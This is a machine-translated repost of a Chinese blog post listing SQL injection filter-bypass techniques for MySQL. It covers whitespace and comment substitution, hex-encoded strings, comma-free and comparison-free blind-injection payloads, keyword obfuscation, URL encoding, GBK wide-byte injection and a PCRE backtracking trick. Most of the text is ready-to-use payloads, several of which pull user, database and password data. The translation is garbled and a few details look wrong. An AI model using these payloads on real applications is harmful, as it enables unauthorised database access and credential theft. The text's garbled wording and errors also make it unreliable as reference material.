Link to the original text ：SQL Injection bypass technique - VVVinson - Blog Garden (cnblogs.com)

1. Around the space （ annotator /* */,%a0）：

　　 Two spaces instead of one , use Tab Instead of spaces ,%a0= Space ：

%20 %09 %0a %0b %0c %0d %a0 %00 /**/  /*!*/

   The most basic way around , Replace spaces with comments ：

/*   notes  */

Use floating-point numbers ：

select * from users where id=8E0union select 1,2,3
select * from users where id=8.0 select 1,2,3

2. Parentheses bypass spaces ：

　　 If spaces are filtered , Parentheses are not filtered , You can use parentheses to bypass .

　　 stay MySQL in , Parentheses are used to enclose subqueries . therefore , Any statement that can calculate the result , Can be enclosed in parentheses . And the ends of the brackets , There can be no extra spaces .

for example ：

select(user())from dual where(1=1)and(2=2)

　　 This filtering method is often used for time based Blind note , for example ：

?id=1%27and(sleep(ascii(mid(database()from(1)for(1)))=109))%23

（from for There will be ）

　　 The above method has neither commas nor spaces . Guessing database（） First character ascii Whether the code is 109, If so, load delay .

3. Quote around （ Use hexadecimal ）：

　　 Quotation marks are usually used at the end where clause . As the following one sql sentence , This statement is a simple query to find users One statement for all fields in the table ：

select column_name  from information_schema.tables where table_name="users"

　　 At this time, if the quotation marks are filtered , So the one above where Clause cannot be used . If you encounter such a problem, you should use Hexadecimal To deal with this problem .
　　users The string is hexadecimal 7573657273. So the last sql The sentence becomes ：

select column_name  from information_schema.tables where table_name=0x7573657273

4. Comma around （ Use from perhaps offset）：

　　 When using blind Injection , Need to be used substr(),mid(),limit. These clause methods need to use commas . about substr() and mid() These two methods can be used from to To solve the problem ：

select substr(database() from 1 for 1);
select mid(database() from 1 for 1);

　　 Use join：

union select 1,2     # Equivalent to 
union select * from (select 1)a join (select 2)b

　　 Use like：

select ascii(mid(user(),1,1))=80   # Equivalent to 
select user() like 'r%'

　　 about limit have access to offset To bypass ：

select * from news limit 0,1
#  Equivalent to the following SQL sentence 
select * from news limit 1 offset 0

5. Comparative symbols （<>） Bypass （ It's filtered out <>：sqlmap Blind injection is often used <>, Use between Script for ）：

Use greatest()、least（）：（ The former returns the maximum value , The latter returns the minimum value ）

　　 Also when using blind Injection , When using binary search, you need to use the comparison operator to find . If the comparison operator cannot be used , Then we need to use greatest To bypass .
　　 The most common one is blind injection sql sentence ：

select * from users where id=1 and ascii(substr(database(),0,1))>64

　　 At this point, if the comparison operator is filtered , The above blind note statement cannot be used , Then you can use it greatest Instead of the comparison operator .greatest(n1,n2,n3,...) Function returns the input parameter (n1,n2,n3,...) The maximum of .
　　 So this one above sql Statement can be used greatest Change to the following clause :

select * from users where id=1 and greatest(ascii(substr(database(),0,1)),64)=64

Use between and：

   between a and b：

between 1 and 1; Equivalent to =1

6.or and xor not Bypass ：

and=&&  or=||   xor=|   not=!

7. Bypass annotation symbols （#,--( Followed by a space ）） Filter ：

id=1' union select 1,2,3||'1

　　 final or '1 Close the last single quotation mark of the query statement , perhaps ：

id=1' union select 1,2,'3

8.= Bypass ：

　　 Use like 、rlike 、regexp perhaps Use < perhaps >

9. Bypass union,select,where etc. ：

（1） Use comments to bypass ：

　　 Common annotators ：

//,-- , /**/, #, --+, -- -, ;,%00,--a

　　 usage ：

U/**/ NION /**/ SE/**/ LECT /**/user,pwd from user

（2） Use case to bypass ：

id=-1'UnIoN/**/SeLeCT

（3） Inline comments bypass ：

id=-1'/*!UnIoN*/ SeLeCT 1,2,concat(/*!table_name*/) FrOM /*information_schema*/.tables /*!WHERE *//*!TaBlE_ScHeMa*/ like database()#

（4） Double keyword bypass （ If you delete the first matching union You can bypass it ）：

id=-1'UNIunionONSeLselectECT1,2,3–-

10. General bypass （ code ）：

　　 Such as URLEncode code ,ASCII,HEX,unicode Code bypass ：

or 1=1 namely %6f%72%20%31%3d%31, and Test It can also be for CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116).

11. The equivalent function bypasses ：

hex()、bin() ==> ascii()

sleep() ==>benchmark()

concat_ws()==>group_concat()

mid()、substr() ==> substring()

@@user ==> user()

@@datadir ==> datadir()

 give an example ：substring() and substr() When it can't be used ：?id=1+and+ascii(lower(mid((select+pwd+from+users+limit+1,1),1,1)))=74　

 perhaps ：
substr((select 'password'),1,1) = 0x70
strcmp(left('password',1), 0x69) = 1
strcmp(left('password',1), 0x70) = 0
strcmp(left('password',1), 0x71) = -1

12. Wide byte Injection ：

　　 Filter ' The idea that is often used is to ' Convert to \' .

　　 stay mysql Use in GBK When coding , I think two characters are a Chinese character , There are generally two ways of thinking ：

　　（1）%df eat \ The specific method is urlencode('\) = %5c%27, We are %5c%27 Add %df , formation  %df%5c%27 , and mysql stay GBK When coding, two bytes will be treated as a Chinese character ,%df%5c It's a Chinese character ,%27 As a separate （'） The symbol is outside ：

id=-1%df%27union select 1,user(),3--+

　　（2） take \' Medium \ To filter out , For example, we can construct %**%5c%5c%27 , hinder  %5c It will be  %5c Comment out .

Generally, it produces wide byte injection PHP function ：

   1.replace（）： Filter ' \ , take ' Turn into \' , take \   To \\, take " To \" . Use idea one .

   2.addslaches()： Returns adding a backslash before a predefined character （\） String . Predefined characters ：' , " , \ . Use idea one

（ Defend against this vulnerability , To put mysql_query Set to binary The way ）

　 　3.mysql_real_escape_string()： Escape the following characters ：

\x00     \n     \r     \     '     "     \x1a

（ defense , take mysql Set to gbk that will do ）

PCRE Bypass ：

union/*'+'a'*1000001+'*/select